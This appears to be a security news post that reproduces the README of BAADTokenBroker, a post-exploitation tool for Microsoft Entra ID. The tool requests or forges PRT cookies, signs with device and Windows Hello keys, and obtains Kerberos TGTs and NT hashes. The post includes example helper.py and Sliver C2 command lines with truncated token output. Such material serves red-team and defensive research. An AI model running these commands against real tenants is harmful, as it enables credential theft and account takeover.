Information Security News

BAADTokenBroker Abuses Microsoft Entra ID Device-Bound Keys for PRT Hijacking

by ·

BAADTokenBroker

BAADTokenBroker is a post-exploitation tool designed to interact with Microsoft Entra ID device-bound keys.

It can:

  • Request the logged-on user’s PRT cookie
  • Create a PRT cookie using supplied credentials
  • Acquire a TGT and NT hash by abusing Entra Kerberos mechanisms

Usage

BAADTokenBroker provides the following commands:

  • info: Retrieve Entra ID information
  • get_token_blob: Dump cached token (this is mainly research purpose and not easy to be used in engagements)
  • sign_with_dkpriv: Sign provided data using Entra device key
  • sign_with_popkey: Sign provided data using POP key
  • decrypt_with_popkey: Decrypt provided data using POP key
  • sign_with_userkey: Sign provided data using Windows Hello for Business key
  • request_prt_cookie: Request a PRT Cookie
  • request_sso_tgs: Request a service ticket for Desktop SSO, which you can use it with your favorite tools like SeamlessPass.

However, to use the commands easily for common scenarios, helper.py generates BAADTokenBroker’s command lines based on what you want to achieve.

Run helper.py with one of the following options:

  • request_prt_cookie

    • Generates command lines to request the logged-on user’s PRT cookie

  • create_prt_cookie

    • Generates command lines to create a PRT cookie using supplied credentials

  • get_tgt

    • Generates command lines to request a partial TGT and session key via a PRT Cookie
      • patched by Microsoft around April 4th, 2026

  • get_tgt_with_whfb

    • Generates command lines to request a partial TGT and session key via Windows Hello for Business

  • get_tgt_with_sso_tgs

    • Generates command lines to request a partial TGT and session key via Desktop SSO Kerberos Ticket

Here is the example when retrieving a user’s PRT Cookie. When you want to generate command lines for sliver, -s option is required.

[pastacode lang=”bash” manual=”%24%20python3%20helper.py%20-s%20request_prt_cookie%0A%5B*%5D%20execute%20BAADTokenBroker%20as%20follows%3A%0ABAADTokenBroker%20–%20–command%20request_prt_cookie%20–arg1%20AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA” message=”” highlight=”” provider=”manual”/]

Execute the command lines like the following

[pastacode lang=”markup” manual=”%5Blocalhost%5D%20sliver%20(_)%20%3E%20BAADTokenBroker%20–%20–command%20request_prt_cookie%20–arg1%20AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA%0A%0A%20%20-arg2%3A%3Cempty%3E%20(default)%0A%20%20-arg3%3A%3Cempty%3E%20(default)%0A%20%20-arg4%3A%3Cempty%3E%20(default)%0A%5B*%5D%20Successfully%20executed%20BAADTokenBroker%20(coff-loader)%0A%5B*%5D%20Got%20output%3A%0A%5B*%5D%20requesting%20PRT%20Cookie…%0A%5B%2B%5D%20request_prt_cookie%20success!%0A%0AeyJhbGciOiJIUzI1NiIsICJrZGZfd…(omitted)” message=”” highlight=”” provider=”manual”/]

Install

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Crypto QR Code
USDT (TRC20):
TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm
USDT (ERC20):
0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce

Tags: